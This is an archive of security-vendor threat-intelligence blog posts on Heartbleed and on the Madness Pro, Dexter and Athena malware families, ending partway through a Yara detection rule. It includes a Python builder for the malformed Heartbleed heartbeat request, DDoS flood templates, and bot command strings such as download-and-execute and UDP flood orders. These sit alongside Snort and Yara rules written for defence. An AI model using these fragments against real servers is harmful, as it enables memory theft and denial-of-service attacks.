The Heartburn Over Heartbleed: OpenSSL Memory Leak Burns Slowly

By: Arbor Networks -

Marc Eisenbarth, Alison Goodrich, Roland Dobbins, Curt Wilson

Background
A very serious vulnerability, present in OpenSSL 1.0.1 for two years, has been disclosed (CVE-2014-0160). This “Heartbleed” vulnerability allows an attacker to reveal up to 64 KB of memory from a connected client or server per heartbeat request. This buffer over-read can be exploited in rapid succession to exfiltrate larger sections of memory, potentially exposing private keys, usernames and passwords, cookies, session tokens, email, or any other data that resides in the affected memory region. The flaw does not affect versions of OpenSSL prior to 1.0.1. This is an extremely serious situation, which highlights the manual nature of the tasks required to secure critical Internet services such as basic encryption and privacy protection.

As the vulnerability has been present for over two years, many modern operating systems and applications have deployed vulnerable versions of OpenSSL. OpenSSL is the default cryptographic library for the Apache and nginx Web servers, which together account for an estimated two-thirds of all Web servers. OpenSSL is also used in a variety of operating systems, including BSD variants such as FreeBSD, and Linux distributions such as Ubuntu, CentOS, Fedora and more. Other networking gear such as load-balancers, reverse proxies, VPN concentrators, and various types of embedded devices are also potentially vulnerable if they rely on OpenSSL, which many do. Additionally, since the vulnerability’s disclosure, several high-profile sites such as Yahoo Mail, LastPass, and the main FBI site have reportedly leaked information. Others have discussed the impact on underground-economy crime forums, which were reportedly vulnerable and were attacked.

A key lesson is that OpenSSL, a vital component of the confidentiality and integrity of countless systems, applications, and sites across the Internet, is an underfunded, volunteer-run project desperately in need of major sponsorship and the attendant allocation of resources.

Mitigation
Anyone running OpenSSL on a server should upgrade to version 1.0.1g. For earlier versions, recompiling with the OPENSSL_NO_HEARTBEATS flag enabled will mitigate this vulnerability. For OpenSSL 1.0.2, the vulnerability will be fixed in 1.0.2-beta2. In terms of remediation, there is a huge amount of work to be done, not only for servers, but also for load-balancers, reverse proxies, VPN concentrators, various types of embedded devices, etc. Applications that were statically compiled against vulnerable versions of the underlying OpenSSL libraries must be recompiled; private keys must be invalidated, re-generated, and re-issued; certificates must be invalidated, re-generated, and re-issued – and there are a whole host of problems and operational challenges associated with these vital procedures. Some systems may be difficult to patch, so network access control restrictions or the deployment of non-vulnerable proxies may be considered where possible to reduce the attack surface.

Exploitation
In most cases, exploitation of this vulnerability leaves no trace in server logs, making it difficult for organizations to know whether they have been compromised. In addition, even after applying the OpenSSL patch, private keys, passwords, authentication credentials, or any other data that was stored in heap memory used by OpenSSL may already have been compromised by attackers, potentially going as far back as two years. Of significant concern is the compromise of private key material, and one security organization reported that it was able to obtain this material during testing. Others reported difficulty in obtaining certificate material but were able to discover significant amounts of other sensitive data. Considering how easy it is for attackers to hammer this vulnerability over and over in very quick succession, the amount of memory disclosed can be quite substantial. Memory contents vary depending on program state, and controlling what is returned, and from what position in memory it is read, is much like a game of roulette.
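The over-read stems from a simple message-format quirk: a heartbeat request carries its own payload-length field, and vulnerable versions trusted it. Below is a minimal sketch of such a malformed record, with field layout per the TLS heartbeat extension (RFC 6520); the 16 KB claimed length is illustrative, similar to what public proof-of-concept tools use:

```python
import struct

def build_heartbeat(claimed_len, payload=b""):
    # Heartbeat message: type 0x01 (request), 16-bit payload length, payload.
    # The bug: a vulnerable peer trusts claimed_len and echoes back that many
    # bytes from its heap, regardless of how few bytes were actually sent.
    hb = struct.pack(">BH", 0x01, claimed_len) + payload
    # TLS record header: content type 0x18 (heartbeat), version TLS 1.1 (0x0302).
    return struct.pack(">BHH", 0x18, 0x0302, len(hb)) + hb

request = build_heartbeat(0x4000)  # claim 16 KB while sending zero payload bytes
```

A patched implementation discards requests whose claimed length exceeds the bytes actually received; a vulnerable one answers with up to 64 KB of adjacent heap memory per request.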

Risk to Private Key Material
In a Twitter exchange beginning on April 8, 2014, security researchers indicated that private keys had been extracted in testing scenarios, and other researchers suggested that attacking servers during, or just after, log-rotation and restart scripts run could expose private key material. ASERT has not tested this claim.

For further details, please see the Twitter thread at https://twitter.com/1njected/status/453781230593769472


Incident Response and Attack Tools
While there have been some calls to avoid over-reaction, organizations should strongly consider revoking and re-issuing certificates and private keys; otherwise, attackers can continue to use private keys they may have obtained to impersonate Websites and/or launch man-in-the-middle attacks. Users should change usernames and passwords as well, but should not enter login credentials on Websites with vulnerable OpenSSL deployments. To do so could invite attackers to compromise both the old and new credentials if they are exposed in memory.

Many tools have been made available to test for the vulnerability, and these same tools are available to attackers as well. It is also reasonable to expect the password-reuse problem to again cause additional suffering, because the same passwords shared across multiple systems extend the attack surface. A shared password that provides access to a sensitive system, or to an e-mail account used for password resets, can be all that an attacker needs to infiltrate an organization’s defenses along multiple fronts.

Multiple proof-of-concept exploits have already been published, and a Metasploit module has been published. Attackers of all shapes and sizes have already started using these tools or are developing their own to target vulnerable OpenSSL servers. There have been reports that scanning for vulnerable OpenSSL servers began before the disclosure of the bug was made public, although other reports suggest that these scans may not have been specifically targeting the Heartbleed vulnerability.

ATLAS Indicates Scanning Activity
ASERT has observed an increase in scanning activity on TCP/443 from our darknet monitoring infrastructure over the past several days, most notably from Chinese IP addresses (Figure 1, below). Two IP addresses (220.181.158.174 and 183.63.86.154) observed scanning TCP/443 have been blacklisted by Spamhaus for exploit activity. Scans from Chinese sources are predominantly coming from AS4134 (CHINANET-BACKBONE) and AS23724 (CHINANET-IDC-BJ-AP).

Figure 1:       TCP/443 scans, Tuesday – Wednesday (April 8-9)



As of this writing, attack activity observed by ASERT had decreased by Thursday. China still accounted for the largest percentage of detected scan activity:

Figure 2:       TCP/443 scans, Thursday (April 10)



Pravail Security Analytics Detection Capabilities

Arbor’s Pravail Security Analytics system provides detection for this vulnerability using the following rules:

2018375 - ET CURRENT_EVENTS TLS HeartBeat Request (Server Intiated)

2018376 - ET CURRENT_EVENTS TLS HeartBeat Request (Client Intiated)

2018377 - ET CURRENT_EVENTS Possible OpenSSL HeartBleed Large HeartBeat Response (Client Init Vuln Server)

2018378 - ET CURRENT_EVENTS Possible OpenSSL HeartBleed Large HeartBeat Response (Server Init Vuln Client)

Examples of detection capabilities are reproduced below.


Heartbleed detection tool screenshot



Analysis of Historical Packet Captures Using New Indicators
In the event of this and other fast-emerging security threats, organizations may wish to consider implementing analysis capabilities on archived packet captures in order to detect the first signs of attack activity. Granular analysis using fresh indicators can help pinpoint where and when a targeted attack (or a commodity malware attack, for that matter) may have first entered the network, or when such attackers may have exfiltrated data using a technique that was not yet being detected on the wire at the time of the initial attack and infiltration. The capabilities of Pravail Security Analytics give organizations the means to accomplish such an analysis. A free account is available at https://www.pravail.com/ – and rest assured that this site is using the latest non-vulnerable OpenSSL version.

Longer-Term Implications and Lessons Learned
Serious questions have been raised regarding the notification process surrounding this vulnerability. The operational community at large has voiced serious disapproval of the early notification of a single content delivery network (CDN) provider, while operating system vendors and distribution providers, not to mention the governmental and financial sectors, were left in the dark and discovered the issue only after it was publicly disclosed via a marketing-related weblog post by the CDN vendor in question. It has been suggested that the responsible-disclosure best practices developed and broadly adopted by the industry over the last decade were in fact bypassed in this case, and concerns have been voiced regarding the propriety and integrity of the disclosure process in this instance.

Recent indications that a significant number of client applications may be utilizing vulnerable versions of OpenSSL as well have broad implications, given the propensity of non-specialist users to ignore software updates and to continue unheedingly running older versions of code.

Furthermore, only ~6% of TLS-enabled Websites (and an undetermined, but most probably even-smaller percentage of other types of systems) make use of Perfect Forward Secrecy (PFS). This configurable option ensures that if an issue of this nature arises, previously encrypted traffic retained in packet captures isn’t susceptible to retrospective cryptanalysis.

Without PFS, there are no automated safeguards that can ameliorate these issues once a vulnerability of this nature has been exposed. Many operators and users may not realize that if attackers captured encrypted traffic in the past from vulnerable services/applications that weren’t configured with PFS – i.e., the overwhelming majority of such systems – and have retained those captured packets, they now have the opportunity to use analysis tools to decrypt the Internet traffic contained in those packets. This means that attackers with access to previously captured packet dumps can potentially unearth victims’ credentials, intellectual property, personal financial information, and so on.

The ability for an attacker to decrypt packet capture archives requires that the attacker has obtained the private keys used to encrypt that traffic. As recent research shows, this is not a theoretical vulnerability – private key material has been compromised in a lab environment and therefore we must assume that attackers have at least the same, if not more substantial capabilities.

The ‘Heartbleed’ vulnerability may well result in an underground market in ‘vintage’ packet captures – i.e., packet captures performed after the date this vulnerability was introduced into OpenSSL, and prior to some date in the future after which it is presumed that the most ‘interesting’ servers, services, applications, and devices have been remediated.

This incident has the potential to evolve into a massive 21st-Century, criminalized, Internet-wide version of the Venona Project, targeting the entire population of Internet users who had the ill fortune to unknowingly make use of encrypted applications or services running vulnerable versions of OpenSSL. This highlights the paradox of generalized cryptographic systems in use over the Internet today.

While the level of complexity required to correctly design and implement cryptosystems means that in most situations, developers should utilize well-known cryptographic utilities and libraries such as OpenSSL, the dangers of a cryptographic near-monoculture have been graphically demonstrated by the still-evolving Heartbleed saga. Further complicating the situation is the uncomfortable fact that enterprises, governments, and individuals have been reaping the benefits of the work of the volunteer OpenSSL development team without contributing the minimal amounts of time, effort, and resources needed to ensure that this vital pillar of integrity and confidentiality receives the investment required to guarantee its continued refinement and validation.

This is an untenable situation, and it is clear that the current development model for OpenSSL is unsustainable in the modern era of widespread eavesdropping and rapid exploitation of vulnerabilities by malefactors of all stripes. Information on how to support the OpenSSL effort can be found here: https://www.openssl.org/support/

Heartbleed and Availability
While Heartbleed is a direct threat to confidentiality, there are also potential implications for availability.

In some cases, attackers seeking exploitable hosts may scan and/or try to exploit this vulnerability so aggressively that they inadvertently DoS the very hosts they’re seeking to compromise. Organizations should be cognizant of this threat and ensure that the appropriate availability protections are in place so that their systems can be defended against both deliberate and inadvertent DDoS attacks.

It should also be noted that initial experimentation seems to indicate that it’s easiest for attackers to extract the private keys from vulnerable OpenSSL-enabled applications and services, using the least amount of exploit traffic, immediately after they have been started.  Accordingly, organizations should be prepared to defend against DDoS attacks intended to cause state exhaustion and service unavailability for SSL-enabled servers, load-balancers, reverse proxies, VPN concentrators, etc.  The purpose of such DDoS attacks would be to force targeted organizations to re-start these services in order to recover from the DDoS attacks, thus providing the attackers with a greater chance of capturing leaked private keys.


References
http://www.openssl.org/news/vulnerabilities.html#2014-0160
http://heartbleed.com
http://blog.existentialize.com/diagnosis-of-the-openssl-heartbleed-bug.html
http://news.netcraft.com/archives/2014/04/02/april-2014-web-server-survey.html
http://threatpost.com/seriousness-of-openssl-heartbleed-bug-sets-in/105309
http://arstechnica.com/security/2014/04/critical-crypto-bug-exposes-yahoo-mail-passwords-russian-roulette-style/
https://www.openssl.org/news/secadv_20140407.txt
https://isc.sans.edu/diary/Heartbleed+vendor+notifications/17929
http://possible.lv/tools/hb/
http://filippo.io/Heartbleed/
https://zmap.io/heartbleed/
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
https://gist.github.com/sh1n0b1/10100394
http://www.seacat.mobi/blog/heartbleed Note: This event may have been a false positive caused by ErrataSec’s masscan software (http://blog.erratasec.com/2014/04/no-we-werent-scanning-for-hearbleed.html)
http://arstechnica.com/security/2014/04/heartbleed-vulnerability-may-have-been-exploited-months-before-patch/
https://twitter.com/1njected/status/453781230593769472

Venona Project: http://en.wikipedia.org/wiki/Venona
PFS: https://community.qualys.com/blogs/securitylabs/2013/08/05/configuring-apache-nginx-and-openssl-for-forward-secrecy

Can I Play with Madness?

By: Jason Jones -

Madness Pro is a relatively recent DDoS bot, first seen by ASERT in the second half of 2013 and also profiled by Kafeine in October 2013. Kafeine’s blog post gave good insight into one method of infection and how quickly a potent DDoS botnet can be built. This post will take a deeper dive into what Madness does upon infection of a system and what its attack capabilities are.

Installation

Madness uses standard methods to achieve persistence on the system and evade detection. For persistence, it sets up autorun via:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run if the user does not have admin privileges
  • via HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
  • if that fails, HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run if the user does have admin privileges

It also creates four files in the user’s home folder named per, perper, perperper, and perperperper (hint: search for these filenames on malwr.com to find more samples :) ). These files contain the registry key values above, followed by [7] and [8] for WORLD_FULL_ACCESS and WORLD_READ_ACCESS, and the bot runs regini on each file to set up permissions on those registry keys before writing the autorun entries above. A mutex named GH5K-GKL8-CPP4-DE24 will also be created to block multiple installations of Madness (since the mutex we have observed has been the same across all samples we have encountered, it also blocks competitors). It will then attempt to bypass the firewall in Windows XP/Vista/7/8 by turning off the firewall service and then disabling autostart of that service.

Many of the interesting strings are encoded with Base64, which include the above-mentioned registry keys, commands, mutex values and operating system names. This makes many of the strings very recognizable and easy to identify with a Yara rule. One example rule has been committed to our GitHub repository.

Capabilities

Capability-wise, Madness Pro has a large number of DDoS attacks and a download-and-execute command. The latest version we have observed in the wild is 1.15. The network phone-homes for Madness resemble the Wireshark screenshot below. They include a unique randomly generated bot ID, a version, the mk parameter, the OS version, the privilege level on the system, c – a counter for the number of phone-homes – and rq – a counter for the number of successful attack payloads sent since the last phone-home. The response from the server is a base64-encoded, newline-separated list of commands. Multiple targets can be specified per command by separating them with a semicolon.

Madness Phone-Home


I also wrote a Suricata / Snort rule to detect these phone-homes:

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[ASERT] TROJAN W32/Madness Checkin"; flow:established,to_server; content:"GET"; http_method; content:"?uid="; pcre:"/\?uid\x3d[0-9]{8}\x26ver\x3d[0-9]\.[0-9]{2}\x26mk\x3d[0-9a-f]{6}\x26os\x3d[A-Za-z0-9]+\x26rs\x3d[a-z]+\x26c\x3d[0-9]+\x26rq\x3d[0-9]+/"; reference:url,www.arbornetworks.com/asert/2014/01/can-i-play-with-madness/; reference:md5,3e4107ccf956e2fc7af171adf3c18f0a; classtype:trojan-activity; sid:3000001; rev:1;)
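For readers who prefer to experiment outside of Snort, the same check-in pattern can be expressed as an ordinary regular expression. The sample URI below is fabricated for illustration; real check-ins carry the bot's actual identifiers and OS values:

```python
import re

# Python equivalent of the check-in pattern matched by the Snort rule above.
CHECKIN = re.compile(
    r"\?uid=[0-9]{8}&ver=[0-9]\.[0-9]{2}&mk=[0-9a-f]{6}"
    r"&os=[A-Za-z0-9]+&rs=[a-z]+&c=[0-9]+&rq=[0-9]+"
)

# Fabricated sample URI for illustration only.
sample = "/check.php?uid=12345678&ver=1.15&mk=ab12cd&os=WinXP&rs=admin&c=4&rq=2"
print(bool(CHECKIN.search(sample)))  # → True
```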

The DDoS attacks use a combination of WinSock, WinInet (InternetOpenRequestA + HttpSendRequestA), and UrlMon (URLDownloadToFileA) functions. The identified commands are shown below:

exe   - download and execute file
wtf   - stop attacks
dd1   - GET Flood using WinSock
dc1   - AntiCookie GET Flood using WinSock
ds1   - Slow GET Flood using WinSock
dd2   - POST Flood Using WinSock
dd3   - GET Flood Using WinInet
dd4   - POST Flood Using WinInet
dd5   - ICMP Flood Using WinSock
dd6   - UDP Flood Using WinSock
dd7   - HTTP Flood Using URLDownloadToFileA

The POST and UDP floods both support specification of flood text by appending ‘@@@’ and then the flood text (the default is ‘flud_text’). The cookie-recognition code will look for document.cookie and cookies specified in the form ["cookie","realauth=<value>","location"] and attempt to parse the value out.

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060731 Firefox/1.5.0.5 Flock/0.7.4.1
Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.6) Gecko/20011128
Mozilla/4.0 (MobilePhone SCP-5500/US/1.0) NetFront/3.0 MMP/2.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
Mozilla/4.0 (Windows; U; Windows NT 6.1; nl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Mozilla/4.0 (Windows NT 5.1; U; en) Presto/2.5.22 Version/10.50
Mozilla/4.0 Galeon/1.2.0 (X11; Linux i686; U;) Gecko/20020326
Opera/10.80 (SunOS 5.8 sun4u; U) Opera 10.8 [en]

The flood template for the WinSock POST request is below; note that the Referer and Cookie headers are only included in the attack if referer and cookie values are present. The user-agent is incrementally selected from the list above (although the AntiCookie code has a small bug :) ). The WinSock GET and AntiCookie GET attacks use similar templates, sans the POST data and, of course, with the GET verb in place of POST.

POST <uri> HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: <target>
Content-Length: <length>
User-Agent: <user-agent from list>
Referer: <referer>
Cookie: <cookie>
Cache-Control: no-cache
Connection: Keep-Alive

<post data>

The Slow GET flood only sends the GET request line and a Host header, sleeps for 100 milliseconds, and then sends the final \r\n\r\n to finish the request.

The UDP and ICMP floods are fairly standard compared to most other DDoS bots. The download-and-execute functionality has been used sparingly on the CnCs that we have tracked, except for….

Playing with Madness

Sometimes a botnet admin mistakenly gives you an FTP download link with server credentials that allows for retrieval of an intact panel, including credentials for the admin area of the web panel. Fortunately, this admin only had a total of 10 bots, and at least 3 of those were researchers :). There’s not much more to the admin panel than what is shown in the screenshot below:

Madness Panel 1.13


Madness Symbols


Sometimes the malware author forgets to run ‘strip’ on the binaries he’s generating for customers, and these end up in my hands. Unfortunately this happened only after I had finished my initial reversing, but I was able to validate my analysis and also identify a few things I had not noticed before. One of the interesting finds was the WinSockGetAntiCookies function, which was not referenced by any calls in that version but has since become the dc1 attack in the latest 1.15 version.

We’ve also had Madness in our botnet tracking system for a number of months and have some interesting data on some of the sites that have been targeted. One of the most popular targets appears to be the “underground” forum fuckav.ru, but the botnets do not appear to be very large, as the availability of the site does not appear to be affected much. The locations of the tracked CnCs are fairly geographically disparate; we have found CnCs hosted in the United States, Russia, Slovakia, the Netherlands, and France.

Conclusion

Given the breadth of the DDoS attacks available in Madness and the ability to attack large numbers of targets at the same time, it does not appear that Madness will be going away anytime soon in the DDoS space. A number of very active CnCs have been observed so far, and we can only expect to see more in the future.

Related MD5:
cc303da2c4b7a031d578c1dbf5af1970
027dcd2e6d231598c47557bdea98843d
60c77216bfcc21a2b993ca7e688f5b20
df99277fb3946c0327f10dc1c501452c
3fb38453a63dca35c0e751a709485e2b
32187e96c5af1177c35813c17302babf

Happy Holidays: Point of Sale Malware Campaigns Targeting Credit and Debit Cards

By: cwilson -

Inside Recent Point-of-Sale Malware Campaign Activities

Curt Wilson, Dave Loftus, Matt Bing

An active Point of Sale (PoS) compromise campaign designed to steal credit and debit card data using the Dexter and Project Hook malware has been detected. Indicators of compromise will be provided for mitigation and detection purposes. Prior to the publication of this Threat Intelligence document (embedded at the end of this post), members of the FS-ISAC, major Credit Card vendors and law enforcement were notified.

It appears that there are at least three distinct versions of Dexter:

  1. Stardust (looks to be an older version, perhaps version 1)
  2. Millenium (note spelling)
  3. Revelation (two observed malware samples; has the capability to use FTP to exfiltrate data)

In early November 2013, ASERT researchers discovered two servers hosting Dexter and other PoS malware, including Project Hook. The Dexter campaign looks more active, especially in the Eastern Hemisphere, and is therefore the main focus herein. Dexter, first documented by Seculert in December 2012, is Windows-based malware used to steal credit card data from PoS systems. The exact method of compromise is not currently known; however, PoS systems suffer from the same security challenges as any other Windows-based deployment. Network and host-based vulnerabilities (such as default or weak credentials accessible over Remote Desktop, or open wireless networks that include a PoS machine), misuse, social engineering, and physical access are likely candidates for infection. Additionally, the potential brittleness and obvious criticality of PoS systems may be a factor in the reportedly slow patch-deployment process on PoS machines, which increases risk. Smaller businesses are likely an easier target due to reduced security. While the attackers may receive less card data from smaller retailers, infections may be more numerous and last longer due to the lack of security reporting and security staff in such environments.

Figure 1: Dexter (Purple) and Project Hook (Orange) infections in the Eastern Hemisphere


Figure 2: Dexter (Purple) and Project Hook (Orange) infections in the western hemisphere


For the full document, including a list of various compromise indicators and information about the back-end infrastructure, please download the full public report -

Dexter and Project Hook Break the Bank


Athena, A DDoS Malware Odyssey

By: Jason Jones -

The Athena malware family has existed for quite some time and appears to have a love/hate relationship with its users, based on posts in various “underground” forums. The original version was IRC-based, but earlier this year an HTTP-based version was released. While not as prevalent as other malware families, Athena has had a strong presence in our malware processing system for quite some time. This blog post will discuss its origins and DDoS capabilities, go over its latest evolution, and offer some details on how to identify it.

Athena’s IRC Origins

I first discovered Athena via a Pastebin post that showed an IRC log of someone ordering attacks via an IRC channel. Some googling and subsequent searching of our zoo for the patterns yielded a wide range of versions of Athena IRC. Many of these appeared to be used to install other malware and not so much for DDoS. The majority of CnCs would put a few sets of initial commands in the IRC channel topic to order their bots to botkill, download other malware, attack a specific site, etc. Athena IRC also uses a recognizable IRC nick format:

n[<country>|<privilege>|<desktop/laptop>|<OS version>|<architecture>|??][a-z]{8}
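As a rough illustration, the format above can be matched with a regular expression. The example nick below is fabricated, and the trailing ?? field is reproduced as-is from the observed format:

```python
import re

# Regex sketch of the Athena IRC nick format: n[ field|field|field|field|field|?? ]
# followed by eight lowercase letters. Field contents here are assumptions;
# live nicks embed the victim's real country, privilege, machine type, OS,
# and architecture values.
NICK = re.compile(r"^n\[[^|\]]+(\|[^|\]]+){4}\|\?\?\][a-z]{8}$")

print(bool(NICK.match("n[US|a|d|W7|x86|??]abcdefgh")))  # → True
```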
AthenaIRC 2.3.1 Manual Cover


Athena has been around for a number of years and is the product of a programmer who goes by the handle “_Stoner”. In the 1.x days of Athena IRC, builders were distributed, but these were cracked and posted online for anyone to use in botnet-building escapades without having to purchase them. Some of these cracked builders contained strings disparaging the quality of Athena and also referenced IPKiller (aka MP-DDOS) as being superior.

The 2.x versions saw this distribution model change, and _Stoner now controls the building and distribution of binaries for his customers. Judging from forum posts and the proliferation of versions that we have seen come through our zoo, business seems to be going well. However, there are numerous complaints on some of the forums about _Stoner going into customers’ IRC servers and channels and taking control of their botnets. He is quick to respond that this is not the case, but that does not appear to help his reputation in some of the underground communities. The version 2 series also saw a significant number of commands added: more DDoS commands, more password-stealing functionality, “IRC War” commands, file find and upload, etc. The bot also optionally features an “encrypted” IP option for the CnC that obfuscates the IP address by adding or subtracting a static value from each octet, depending on whether the octet falls in the top or bottom half of the valid range. This feature was observed in our sandboxing system many times where a CnC hostname pointed to one IP, but a different IP was then connected to for CnC – quite confusing initially, but easy to spot once we found out some of the binaries had this feature. Athena also has encrypted commands that simply use a lookup table to find an index into a keyring and then a secondary lookup to get the decrypted character.
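The IP obfuscation scheme described above can be sketched as follows. Both the offset value (50) and the add/subtract direction per half of the octet range are assumptions for illustration; each Athena build embeds its own static value:

```python
OFFSET = 50  # assumed; each build embeds its own static value

def obfuscate_octet(o, offset=OFFSET):
    # Bottom-half octets (0-127) get the offset added; top-half octets
    # (128-255) get it subtracted (direction assumed), which keeps the
    # result inside the valid 0-255 range.
    return o + offset if o < 128 else o - offset

def obfuscate_ip(ip, offset=OFFSET):
    # Apply the per-octet transform to a dotted-quad address.
    return ".".join(str(obfuscate_octet(int(p), offset)) for p in ip.split("."))
```

This kind of transform explains the sandbox observation above: the IP the hostname resolved to and the IP the bot actually contacted differ by a fixed per-octet offset.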

The pricing structure for 2.3.1 is $100 for one build, $10 for a rebuild or update, $15 to have _Stoner set up your IRC, and $130 for one build plus a ready-made IRC channel that is “capable of holding 20k bots”.

Athena, Goddess of IRC War?

Not quite :) When I first started reversing Athena IRC, I felt like I was Daedalus trying to navigate the Labyrinth. I finally found my way to an exit and avoided the Minotaur whilst discovering where the DDoS commands were processed.

Athena IRC Command Parsing

Athena IRC Command Parsing

Athena offers many DDoS attacks, including standard HTTP GET/POST floods, a UDP flood, RUDY, Slowloris, Slowpost, ARME, an HTTP flood via a hidden browser, bandwidth floods, and an established-connection flood. The attacks perform as advertised, but, unlike other DDoS bots, only one attack can be carried out at a time. This severely limits Athena’s ability to compete in the underground DDoS-for-hire marketplace with bots like Madness, Drive, and DirtJumper.

For its HTTP-based attacks, Athena uses one subroutine to construct the HTTP request template. Random numbers are generated, and if they are above or below certain values, different values are selected for each header; in some cases the randomly generated value is used to determine whether or not to include a header at all. The image below illustrates the possible headers and the potential values for those that are included. Green means the value is selected based on which attack is ordered, values in black are always included, headers in blue are randomly included, and the red values are those from which the final header value is selected.

Athena HTTP Request Building

Athena HTTP Request Building

Athena Moves to HTTP

The HTTP version of Athena first popped onto my radar in late March of this year when Exposed Botnets covered it for the first time, but I was not able to locate any samples at the time. Fast forward a few weeks and many samples started flowing our way.

The command and control protocol for Athena HTTP is fairly interesting. There are three parameters – a, b, and c – that are sent with the POST request to the CnC. The a parameter is a fully URL-encoded base64 string that provides a colon-separated string translation table. The translation table is applied to the b parameter, which is another base64 string – this time not URL-encoded – and then base64-decoded to yield the phone-home data of the bot; c is used as a data marker in the response from the server. The initial phone-home format string is below, where gend is the “gender” (laptop, desktop, etc.), ver is the Athena HTTP version installed, net is the .NET version installed, and the rest are fairly self-explanatory.

  |type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|

Subsequent phone-homes use the following format string. The bk_ fields signify “botkill” data, and busy signifies whether or not the bot is busy with a command.

  |type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|
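Both phone-home formats are plain pipe-delimited key:value strings, so a minimal parser is straightforward. This is a sketch for illustration, not ASERT's actual tooling, and it assumes values never contain pipe characters:

```python
def parse_phone_home(msg):
    # Split "|type:on_exec|uid:abc|...|" into a dict; only the first colon
    # in each field separates key from value.
    fields = {}
    for part in msg.strip("|").split("|"):
        if part:
            key, _, value = part.partition(":")
            fields[key] = value
    return fields
```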

The server applies the string translation table sent by the bot to the set of newline-separated, base64-encoded commands before adding the data marker to the front of the string. Without the original phone-home from the bot, this makes determining the commands sent by the CnC extremely difficult. The commands sent by the CnC are pipe-delimited, with taskid=&lt;task id&gt; in the first part and command=&lt;command&gt; in the second.
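Putting the pieces together, a captured a parameter lets you decode the server's response. The sketch below assumes a particular layout for the translation table – a colon-separated “from:to” pair of alphabets – which is an assumption on my part, not a confirmed detail of the protocol:

```python
import base64
import urllib.parse

def parse_table(a_param):
    # 'a' is URL-encoded base64; assumed here to decode to "<from>:<to>"
    raw = base64.b64decode(urllib.parse.unquote(a_param)).decode()
    src, dst = raw.split(":", 1)
    # build the inverse mapping to undo the server-side translation
    return str.maketrans(dst, src)

def decode_response(body, table, marker):
    # The server prepends the data marker (the 'c' parameter) and then sends
    # newline-separated, translated, base64-encoded commands.
    assert body.startswith(marker)
    lines = body[len(marker):].split("\n")
    return [base64.b64decode(line.translate(table)).decode()
            for line in lines if line]
```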

The commands follow the exact same structure as the IRC version, and the same parsing method is used once the command is extracted. Some examples are presented below:

|taskid=120|command=!ddos.layer4.udp <target-site> <port> <time>|
|taskid=115|command=!ddos.http.bandwidth <target-url> <port> <time>|
|taskid=37|command=!download <target-url> 1|

A script to decode the phone-home and display commands is included in the ASERT GitHub repository.

Athena Commands Her DDoS Army

Some careless botnet admins left archives of their control panels floating around on their CnCs, which greatly sped up my reverse engineering of how the Athena HTTP binaries operate. The server-side PHP code has a decent amount of obfuscation, but it is not terribly difficult to bypass. The screenshots below show the stages of deobfuscation that I went through to recover readable PHP code:

The panel isn’t anything flashy, but is quite usable and shows the state of all bots and commands. I fired up an internal version of the control panel to experiment with and the results are below (please note: these are not real commands, all fake):

Athena, Beyond DDoS

Athena HTTP shares the previously described weakness of only being able to carry out one attack at a time, and has not been observed to be nearly as active in the DDoS space as other bots monitored by ASERT. This raises the question of what it is used for. One of the most popular uses we have observed on the CnCs we monitor is as a pay-per-install (PPI) botnet. Over the last six months, we have collected over 150 new executables by monitoring the URLs that bots were told to download. A timeline graph is shown below; unlabeled yellow dots are samples that were unidentified by our tagging system and did not exist on VirusTotal at the time of initial processing. Many of these turned out to be Bitcoin/Litecoin/etc. miners, while others were password-stealing applications. Apologies for the overlap on names; it was extremely difficult to separate them due to the high volume during a few short periods when people appeared to be testing out their new botnets. The large gap from late August through early October was due to a slight change in identification that caused our monitoring system to miss new samples, and is not necessarily reflective of new malware not being dropped.

Athena HTTP Dropped Malware Timeline

 

Athena’s Achilles Heel

Easy identification via multiple means. The easily identifiable IRC nicks and recognizable HTTP POSTs discussed previously make detection on the network easy, but there are also many other ways to identify both versions of this malware. Athena – both IRC and HTTP – typically uses mutexes that look like (UPDATE_|BACKUP_|MAIN_)-?[0-9]{10} (great for finding samples on malwr.com via a mutex: search) and additionally has many easily identifiable strings depending on the version. One yara rule is presented below that catches many, but not all, samples of the IRC version, along with another rule that has so far detected all of the HTTP versions we have seen – both are also available in the Arbor Github repository. The Microsoft Security Essentials engine identifies the IRC and early versions of Athena HTTP as Trojan:Win32/Squida.A, but has more recently started identifying Athena HTTP as Trojan:Win32/Folyris.A.
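For quick triage of sandbox reports, the mutex pattern above drops straight into a short script:

```python
import re

# Mutex pattern quoted above: UPDATE_/BACKUP_/MAIN_ prefix, an optional
# minus sign, then exactly ten digits.
ATHENA_MUTEX = re.compile(r"^(UPDATE_|BACKUP_|MAIN_)-?[0-9]{10}$")

def is_athena_mutex(name):
    # Returns True if a mutex name matches the Athena naming convention
    return bool(ATHENA_MUTEX.match(name))
```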

 

rule athena_http {
  meta:
    author = "Jason Jones <jasonjones@arbor.net>"
    description = "Athena HTTP identification"
  strings:
    $fmt_str1 = "|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|"
    $fmt_str2 = "|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|"
    $cmd1 = "filesearch.stop"
    $cmd2 = "rapidget"
    $cmd3 = "layer4."
